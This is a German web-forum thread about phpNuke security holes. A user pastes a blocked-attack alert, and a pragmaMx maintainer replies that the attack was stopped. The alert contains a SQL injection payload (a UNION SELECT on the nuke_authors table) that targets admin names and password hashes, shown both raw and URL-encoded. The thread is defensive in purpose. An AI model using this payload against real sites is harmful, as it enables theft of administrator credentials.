Suche

[Andi]

In phpNuke sind anscheinend wieder ein paar neue Sicherheitslöcher bekannt geworden.
phpnuke.de: http://www.phpnuke.de/beitrag_Sicherheitsfix+f%FCr+PHP+Nuke+7+8_244.html
securityfocus: http://www.securityfocus.com/archive/1/410314/30/0/threaded

Nach kurzer Durchsicht der relevanten pragmaMx Dateien bleibt zu sagen, dass das pragmaMx (und vkpMx) nicht davon betroffen ist.

[Karaca]

Hab gestern diese mail bekommen:


14-09-2005 20:32:18 [Union] Hack detected (0)
user: Anonymous
admin: Anonymous
request:
_GET[name] = Web_Links 
_GET[l_op] = viewlinkeditorial 
_GET[lid] = -1 UNION SELECT name,1,pwd,aid FROM nuke_authors 
_COOKIE[mxB2732F3EEFA19C5C632205F7CE662E] = 8b82dd2e690ac90f091850d55a7c2322 
_COOKIE[mxB2732F3EEFA19C5C632205F7CE662E (encoded)] = ñ¿6uİžëİsİÓİ|çGyå®ÜÛ}¶
Serverinfo:
REMOTE_ADDR:          81.215.10.28
QUERY_STRING:         name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
REQUEST_URI:          /modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
REMOTE_PORT:          1768
REMOTE_HOST:         
HTTP_REFERER:         
HTTP_USER_AGENT:      Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP_X_FORWARDED_FOR:




Muss ich mir da sorgen machen ?  Das ist doch ein ganz alter exploit den es damals bei nuke 6.0 gab oder?

[Andi]

Moin

jop, wenn du die Nachricht bekommst, dann ist der Möchtegernhack geblockt worden...
Also, nix passiert